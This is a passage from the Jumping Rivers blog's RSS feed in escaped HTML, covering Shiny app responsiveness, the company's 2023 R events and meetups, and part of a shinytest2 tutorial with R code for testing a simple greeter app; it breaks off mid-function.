&lt;p&gt;Static content has other advantages - it&amp;rsquo;s largely agnostic to device size and form, it&amp;rsquo;s probably easier to make accessible and it&amp;rsquo;s almost certainly quicker and easier to assemble and maintain. As &lt;a href="https://www.youtube.com/watch?v=8_k-iPwcleU" rel="external"&gt;Colin Fay pointed out&lt;/a&gt; in &lt;em&gt;his&lt;/em&gt; Shiny in Production 2022 talk, interactive elements also have a learning curve associated with them that you don&amp;rsquo;t find with a png image or a simple HTML table. Direct manipulation only works if the user understands what and how to manipulate.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Improving the responsiveness of a Shiny application can help the user feel more like they are in control and that they are using professional software created by thoughtful designers. Greater responsiveness can be achieved through simple changes like loading indicators and progress bars or through the use of htmlwidgets which move some of the burden from the Shiny server to the user&amp;rsquo;s own browser. However, interactive applications do have a maintenance cost to the designer and a learning curve for the user. It is worthwhile considering whether these costs are justified before starting a project.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/improving-responsiveness-shiny-applications/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Events at Jumping Rivers</title><link>https://www.jumpingrivers.com/blog/events-at-jumping-rivers/</link><pubDate>Tue, 24 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/events-at-jumping-rivers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/events-at-jumping-rivers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/events-at-jumping-rivers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;At Jumping Rivers we&amp;rsquo;re all about getting involved in the R community! As such, we host multiple events throughout the year. Read on for information about what we have planned so far for 2023!&lt;/p&gt;
&lt;h3 id="conferences"&gt;Conferences&lt;/h3&gt;
&lt;h4 id="satrdays-london-2023"&gt;SatRdays London 2023&lt;/h4&gt;
&lt;p&gt;In April 2023 we will be hosting SatRdays at Bush House, London. SatRdays are low-cost, not-for-profit events that aim to attract those who ordinarily wouldn&amp;rsquo;t be able to attend pricier events, or who can&amp;rsquo;t usually make it during the week.&lt;/p&gt;
&lt;p&gt;Our Keynote speaker for this event is &lt;a href="https://juliasilge.com/" rel="external"&gt;Julia Silge&lt;/a&gt;, Posit. Julia Silge is a data scientist and software engineer at &lt;a href="https://posit.co/" rel="external"&gt;Posit PBC&lt;/a&gt; (formerly RStudio) where she works on open source modeling and MLOps tools. She is an author, an international keynote speaker, and a real-world practitioner focusing on data analysis and machine learning. Julia loves text analysis, making beautiful charts, and communicating about technical topics with diverse audiences.&lt;/p&gt;
&lt;p&gt;We are also accepting abstracts for contributed talks until midnight (GMT) Tuesday, 31st January, so head over to the conference website for more details on how to submit your talk. Anything R related is welcome!&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Where: &lt;a href="https://goo.gl/maps/J2ajU6KDZYF7PtSk7" rel="external"&gt;30 Aldwych, London WC2B 4BG, United Kingdom&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;When: 22nd April 2023&lt;/li&gt;
&lt;li&gt;&lt;a href="https://satrday-london-2023.jumpingrivers.com/" rel="external"&gt;Website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-events-at-jumping-rivers"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h4 id="shiny-in-production-2023"&gt;Shiny in Production 2023&lt;/h4&gt;
&lt;p&gt;Shiny in Production returns to Newcastle this October. Last year&amp;rsquo;s conference was a huge success, and this year we&amp;rsquo;re expecting it to be bigger and better than ever. Whether you’re a seasoned {shiny} user who wants to network and share knowledge, someone who’s just getting started and wants to learn from the experts, or anybody in between, if you’re interested in {shiny}, this conference is for you.&lt;/p&gt;
&lt;p&gt;The conference consists of an afternoon of workshops on a range of topics delivered by our JR trainers, followed by a day of talks from experts across a variety of sectors. Last year, the workshops were on RStudio (now Posit) Connect, Tableau and Automated Reporting with Quarto; keep an eye out for when we announce what is in store for this year!&lt;/p&gt;
&lt;p&gt;If you want to take a look at some of what you missed last year, we have a &lt;a href="https://youtube.com/playlist?list=PLbARZQfpqIKJ6Un06aThcKJC7eQMSgKRD" rel="external"&gt;playlist of talk recordings available to watch on YouTube&lt;/a&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Where: &lt;a href="https://goo.gl/maps/sesSfqZQAmkdRMaA9" rel="external"&gt;The Catalyst, 3 Science Square, Newcastle Helix, Newcastle upon Tyne NE4 5TG, United Kingdom&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;When: 12th - 13th October 2023&lt;/li&gt;
&lt;li&gt;&lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Website&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="meetups"&gt;Meetups&lt;/h3&gt;
&lt;p&gt;Jumping Rivers currently hosts two data science meetups, the North East Data Scientist (NEDS) meetup and the Leeds Data Science meetup.
These meetups are free events that aim to bring together like-minded people to discuss all things data science.
We invite speakers from a range of backgrounds, including public sector and private industry, to share their experience and demonstrate how data science impacts the world.&lt;/p&gt;
&lt;p&gt;At the NEDS meetups, we also host a pre-event workshop, run by one of our JR trainers, where we&amp;rsquo;ll go into more detail about a specific tool or package and give you the opportunity to code along! And of course, all meetups are great opportunities to network and find out more about what&amp;rsquo;s going on in the world of data science - fuelled by pizza!&lt;/p&gt;
&lt;h4 id="north-east-data-scientists-neds"&gt;North East Data Scientists (NEDS)&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Where: &lt;a href="https://goo.gl/maps/sesSfqZQAmkdRMaA9" rel="external"&gt;The Catalyst, 3 Science Square, Newcastle Helix, Newcastle upon Tyne NE4 5TG, United Kingdom&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;When: Every two months, third Thursday of the month. Next meetup is 16th March 2023&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/newcastle-upon-tyne-data-science-meetup/" rel="external"&gt;Meetup page&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="leeds-data-science-meetup"&gt;Leeds Data Science Meetup&lt;/h4&gt;
&lt;ul&gt;
&lt;li&gt;Where: &lt;a href="https://goo.gl/maps/6Cc71DCdZU9uNgqF8" rel="external"&gt;Platform, New Station St, Leeds LS1 4JB, United Kingdom&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;When: Every two months. Next meetup is 31st January 2023&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.meetup.com/leeds-data-science-meetup/" rel="external"&gt;Meetup page&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/events-at-jumping-rivers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>End-to-end testing with shinytest2: Part 3</title><link>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/</link><pubDate>Thu, 19 Jan 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-3/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the final part of a series of three blog posts about using the
{shinytest2} package to develop automated tests for shiny applications.
In the posts we cover&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-1/" rel="external"&gt;the purpose of browser-driven end-to-end tests for a shiny
developer, and tools (like {shinytest2}) that help implement
them&lt;/a&gt;;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;a href="https://www.jumpingrivers.com/blog/end-to-end-testing-shinytest2-part-2/" rel="external"&gt;how to write and run a simple test using
{shinytest2}&lt;/a&gt;;&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;how best to design your test code so that it supports your future
work (this post).&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;By this point in the blog series, we have created a simple shiny
application as an R package, added the {shinytest2} testing
infrastructure, and have written, run, broken and fixed a {shinytest2}
test case. Here, we will add a new feature to the application. As in
real (programming) life, we will add a new test for this feature, and
ensure that our old test still passes.&lt;/p&gt;
&lt;p&gt;UI-driven end-to-end tests require a bit more code than unit tests. For
example, starting the app and navigating around to set up some initial
state will require a few lines of code. But these are things you’ll
likely need to do in several tests. As you add more and more test cases
and these commonalities reveal themselves, it pays to extract out some
helper functions and/or classes. By doing so, your tests will look
simpler, the behaviour that you are testing will be more explicit, and
you’ll have less code to maintain. We’ll show some software designs that
may simplify your {shinytest2} code.&lt;/p&gt;
&lt;p&gt;This post builds upon the previous posts in the series, but is quite a
bit more technical than either of them. In addition to shiny
development, you’ll need to know how to define functions in R and, for
the last section, you’ll need to know about object-oriented programming
in R (specifically using R6). The ideas in that section may be of
interest even if you aren’t fluent with R6 classes yet.&lt;/p&gt;
&lt;p&gt;Let’s get started.&lt;/p&gt;
&lt;h2 id="the-initial-application"&gt;The initial application&lt;/h2&gt;
&lt;p&gt;Our initial shiny application had a text field where the user could
enter their name and a “Greet” button. The source code can be obtained
from
&lt;a href="https://github.com/jumpingrivers/blog/tree/main/blogs/r-shinytest2/part-2/" rel="external"&gt;GitHub&lt;/a&gt;.
On clicking the button, a greeting (“Hello &amp;lt;username&amp;gt;!”) is displayed in
the app. The source code for the user interface and server function is
shown below.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In ./R/ui.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ui &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(req) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;fluidPage&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textInput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;name&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;What is your name?&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;actionButton&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;Greet&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In ./R/server.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;server &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(input, output, session) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greeting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;req&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greet)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hello &amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;isolate&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name), &lt;span style="color:#a5d6ff"&gt;&amp;#34;!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; })
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;For this app we have a single test that checks that the greeting is
displayed once the user has entered their name and clicked the “Greet”
button.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app updates user&amp;#39;s name on clicking the button&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: the app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;greeting&amp;#34;&lt;/span&gt;, screenshot_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-end-to-end-testing-shinytest2-part-3"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="writing-your-second-test"&gt;Writing your second test&lt;/h2&gt;
&lt;p&gt;We’ll add a second bit of functionality to the app first. A simple
change might be to greet the user in Spanish:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In the UI&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;textOutput&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeting&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# In the server&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;output&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;spanish_greeting &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;renderText&lt;/span&gt;({
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;req&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;greet)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;paste0&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Hola &amp;#34;&lt;/span&gt;, &lt;span style="color:#d2a8ff;font-weight:bold"&gt;isolate&lt;/span&gt;(input&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;name), &lt;span style="color:#a5d6ff"&gt;&amp;#34;!&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The first thing to note is that with the change to the app, the first
test still passes. It would have failed had we not restricted our test
to just look at the &lt;code&gt;greeting&lt;/code&gt; variable (for example, if we had used
&lt;code&gt;app$expect_values()&lt;/code&gt; to make a snapshot of all the variables that are
in play and to take an image of the app).&lt;/p&gt;
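&lt;p&gt;To make the contrast concrete, here is a sketch of the two calls, assuming
&lt;code&gt;app&lt;/code&gt; is the &lt;code&gt;AppDriver&lt;/code&gt; object created in the test above:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Restricted snapshot: only the `greeting` output is recorded, so adding
# `spanish_greeting` to the app leaves the stored snapshot unchanged
app$expect_values(output = &amp;#34;greeting&amp;#34;, screenshot_args = FALSE)

# Unrestricted snapshot: every input, output and exported value is recorded,
# so the new `spanish_greeting` output would show up as a difference
app$expect_values()
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;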
&lt;p&gt;We want to add a new test to check the &lt;code&gt;spanish_greeting&lt;/code&gt; as well as the
&lt;code&gt;greeting&lt;/code&gt; variable.&lt;/p&gt;
&lt;p&gt;To add a new test to the app, we could use the {shinytest2} recorder (as
in the previous post), or we could just copy and paste the first test,
and modify the bits we need to. We’ll do the latter.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ./tests/testthat/test-e2e-greeter_accepts_username.R&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# ... snip ...&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;test_that&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;the greeter app prints a Spanish greeting to the user&amp;#34;&lt;/span&gt;, {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# GIVEN: The app is open&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; shiny_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinyGreeter&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;run&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; shinytest2&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;AppDriver&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;new&lt;/span&gt;(shiny_app, name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeter&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_window_size&lt;/span&gt;(width &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;1619&lt;/span&gt;, height &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;970&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# WHEN: the user enters their name and clicks the &amp;#34;Greet&amp;#34; button&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;set_inputs&lt;/span&gt;(name &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;Jumping Rivers&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;click&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;greet&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#8b949e;font-style:italic"&gt;# THEN: a Spanish greeting is printed to the screen&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; app&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;expect_values&lt;/span&gt;(output &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;spanish_greeting&amp;#34;&lt;/span&gt;, screenshot_args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;})
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Note that we have changed the &lt;code&gt;name&lt;/code&gt; argument to &lt;code&gt;AppDriver$new()&lt;/code&gt;. This
allows us to have multiple test cases in the same script: if the
&lt;code&gt;AppDriver&lt;/code&gt;s for the English and Spanish tests were both given
&lt;code&gt;name=&amp;quot;greeter&amp;quot;&lt;/code&gt;, both snapshots would be written to the same file.&lt;/p&gt;
&lt;h2 id="use-functions-to-simplify-and-clarify-your-test-code"&gt;Use functions to simplify and clarify your test code&lt;/h2&gt;
&lt;p&gt;The new test is almost identical to the previous one we wrote. That kind
of duplication should set off alarm bells - more duplication means more
maintenance.&lt;/p&gt;
&lt;p&gt;In R, the simplest way to reduce code duplication is by writing a
function.&lt;/p&gt;
&lt;h3 id="simplify-the-set-up-code"&gt;Simplify the set-up code&lt;/h3&gt;
&lt;p&gt;Let’s add a function to get the app into the pre-test state:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;initialise_test_app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(name) {
